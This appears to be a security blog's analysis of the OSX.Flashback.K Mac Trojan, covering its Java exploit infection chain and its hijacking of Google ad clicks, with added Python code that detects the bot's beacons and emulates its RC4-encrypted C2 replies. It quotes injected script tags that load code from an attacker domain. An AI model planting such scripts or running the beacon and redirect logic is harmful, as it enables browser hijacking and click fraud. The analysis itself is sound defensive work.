We've been busy in the labs reverse engineering the various components of OSX.Flashback.K to determine the true motivation behind the malware. Let's take a look at this Mac Trojan in more detail.
The Infection
It's now well known that the latest OSX.Flashback.K variant was being distributed using the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which Oracle patched in February. Unfortunately for Mac users, there was a large window of exposure, since Apple's patch for this vulnerability did not ship for another six weeks.
This window of opportunity helped the Flashback Trojan infect Macs on a large scale. The Flashback authors took advantage of the gap between Oracle's and Apple's patches by compromising vulnerable websites running WordPress and Joomla and adding malicious script snippets such as the following:
<script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script>
<script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>
If a user visited a compromised site on an unpatched Mac, OSX.Flashback.K would be installed. Here is a breakdown of the Flashback stages of infection:
- A user visits a compromised website.
- The browser is redirected to an exploit site hosting numerous Java exploits.
- CVE-2012-0507 is used to decrypt and install the initial OSX.Flashback.K component.
- This component downloads a loader and an Ad-clicking component.
Little detail has been published about the ad-clicking component, so we will reveal the true motivation behind the malware: the end goal of this Trojan is revenue generation.
Ad-clicking Component
The Flashback ad-clicking component is loaded into Chrome, Firefox, and Safari, where it can intercept all GET and POST requests made by the browser. Flashback specifically targets search queries made on Google and, depending on the query, may redirect the user to another page of the attacker's choosing, earning the attackers revenue for the click. (Google never receives the intended ad click.)
The ad-click component parses out requests resulting from an ad click on Google Search and checks whether the destination is on a whitelist. If it is not, it forwards the request to the malicious server in the following form:
http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
Flashback uses a specially crafted User-Agent header in these requests, which is actually the client's universally unique identifier (UUID) encoded in base64. The same value is already sent in the "ua" query string parameter, so the header is most likely an effort to thwart "unknown" parties from investigating the URL with unrecognised user agents.
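The request shape above is enough to write a detection for the check-in traffic without knowing the C2 domain. The following is an added example (not code from the original post or from the malware): it emulates how the bot builds its beacon URL and User-Agent, then scans constructed proxy log lines for requests matching that shape. The domain, the client UUID, the log line format and the "al"/"cv" values are assumptions; the placeholder domain is not a real C2 host.

```python
import base64
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Placeholder for the redacted C2 host; the real domain is not given on the page.
FLASHBACK_DOMAIN = "flashback-c2.example"

UUID_RE = re.compile(
    r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


def uuid_user_agent(client_uuid: str) -> str:
    """The User-Agent the bot sends: the client's UUID, base64-encoded."""
    return base64.b64encode(client_uuid.encode("ascii")).decode("ascii")


def build_beacon_url(query: str, ua: str, lang: str, version: str,
                     domain: str = FLASHBACK_DOMAIN) -> str:
    """Check-in URL in the shape the post describes:
    http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
    """
    return "http://%s/search?%s" % (
        domain, urlencode({"q": query, "ua": ua, "al": lang, "cv": version}))


def decode_uuid_ua(ua: str):
    """Return the UUID if `ua` is a base64-encoded UUID string, else None."""
    try:
        decoded = base64.b64decode(ua, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if UUID_RE.match(decoded) else None


def looks_like_flashback_beacon(url: str, ua: str) -> bool:
    """Heuristic on request shape alone: path /search carrying exactly the
    q, ua, al and cv parameters, plus a User-Agent that is a base64 UUID."""
    parsed = urlparse(url)
    if parsed.path != "/search":
        return False
    params = parse_qs(parsed.query)
    if set(params) != {"q", "ua", "al", "cv"}:
        return False
    return decode_uuid_ua(ua) is not None


def scan_proxy_log(lines):
    """Return (client_ip, url, decoded_uuid) for each suspected beacon.
    Log format (constructed for this example): '<client-ip>\\t<url>\\t<user-agent>'."""
    hits = []
    for line in lines:
        client_ip, url, ua = line.rstrip("\n").split("\t", 2)
        if looks_like_flashback_beacon(url, ua):
            hits.append((client_ip, url, decode_uuid_ua(ua)))
    return hits


# Constructed sample traffic: one genuine Google search and one emulated beacon.
CLIENT_UUID = "6ba7b810-9dad-11d1-80b4-00c04fd430c8"  # example UUID, not a real victim
BEACON_UA = uuid_user_agent(CLIENT_UUID)
SAMPLE_LOG = [
    "10.0.0.5\thttp://www.google.com/search?q=toys\t"
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3",
    "10.0.0.5\t" + build_beacon_url("toys", BEACON_UA, "en", "1.0") + "\t" + BEACON_UA,
]

if __name__ == "__main__":
    for ip, url, client in scan_proxy_log(SAMPLE_LOG):
        print(f"{ip} beacon from client {client}: {url}")
```

The genuine Google search is rejected twice over: its User-Agent is not valid base64, and its query string lacks the ua/al/cv parameters. Matching on the parameter set rather than the hostname means the rule survives the gang rotating domains, which is the point of keying on the UUID User-Agent the post describes.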
The response is RC4 decrypted and then base64 decoded to reveal:
This hijacked ad click is based on a user searching for "toys". BIDOK is one of at least five commands that Flashback expects to receive in response; for the ad-clicking component, it is the one we are interested in.
We can clearly see a value of 0.8 cents for the click and the redirection URL, highlighted in red. This redirect URL is subsequently written into the browser so that the user is directed to the new site, in effect hijacking the ad click Google should have received.
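To make the response handling concrete, here is an added example (not the malware's code and not from the original post) that reproduces the two decoding layers in the order the post gives, RC4 decryption followed by base64 decoding, and then acts on a BIDOK reply. The RC4 key, the line-based layout of the decrypted command, the numeric format of the bid and the name of the non-BIDOK command are all assumptions; the page shows the real layout only in a screenshot.

```python
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_response(ciphertext: bytes, key: bytes) -> str:
    """Undo the two layers in the order the post gives: RC4-decrypt, then base64-decode."""
    return base64.b64decode(rc4(key, ciphertext)).decode("utf-8")


def encode_response(plaintext: str, key: bytes) -> bytes:
    """Inverse of decode_response, used here only to build sample responses."""
    return rc4(key, base64.b64encode(plaintext.encode("utf-8")))


def parse_command(text: str):
    """Assumed layout: line 1 = command; for BIDOK, line 2 = bid value and
    line 3 = redirect URL. Returns (command, bid, redirect_url), with bid and
    URL set to None for any other command."""
    lines = text.strip().split("\n")
    command = lines[0].strip()
    if command == "BIDOK" and len(lines) >= 3:
        return command, float(lines[1]), lines[2].strip()
    return command, None, None


def hijack_decision(response: bytes, key: bytes):
    """What the browser component does with a C2 reply: redirect only on BIDOK."""
    command, bid, url = parse_command(decode_response(response, key))
    if command == "BIDOK":
        return {"redirect": url, "bid": bid}
    return None


# Constructed samples. The key is invented; the page reports 0.8 cents for the
# "toys" click but not the numeric format the server uses, so "0.8" is assumed.
# "NOBID" is a hypothetical name standing in for one of the other commands,
# which the page does not list.
C2_KEY = b"example-rc4-key"
SAMPLE_BIDOK = encode_response("BIDOK\n0.8\nhttp://ecomint.com/?q=toys", C2_KEY)
SAMPLE_OTHER = encode_response("NOBID\n", C2_KEY)

if __name__ == "__main__":
    print(hijack_decision(SAMPLE_BIDOK, C2_KEY))  # redirect to ecomint.com, bid 0.8
    print(hijack_decision(SAMPLE_OTHER, C2_KEY))  # None: nothing is rewritten
```

Because RC4 is a stream cipher with a fixed key, the same `rc4` routine serves both the analyst decoding captured responses and an emulator generating test replies; the only thing a sandbox needs to feed it is the key recovered from the sample.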
Here is the script that is inserted into the user's browser when the returned [REDIRECT_URL] is [http://]ecomint.com/?q=toys.
This ultimately results in lost revenue for Google and untold sums of money for the Flashback gang.
Ad-clicking Trojans are nothing new: in an analysis of W32.Xpaj.B last August, a botnet of roughly 25,000 infections could generate the author up to $450 per day. Since the Flashback botnet numbers in the hundreds of thousands, this figure could rise sharply, to the order of $10,000 per day.
A very profitable enterprise indeed, and all the more reason to keep your Mac fully patched and your virus definitions up to date.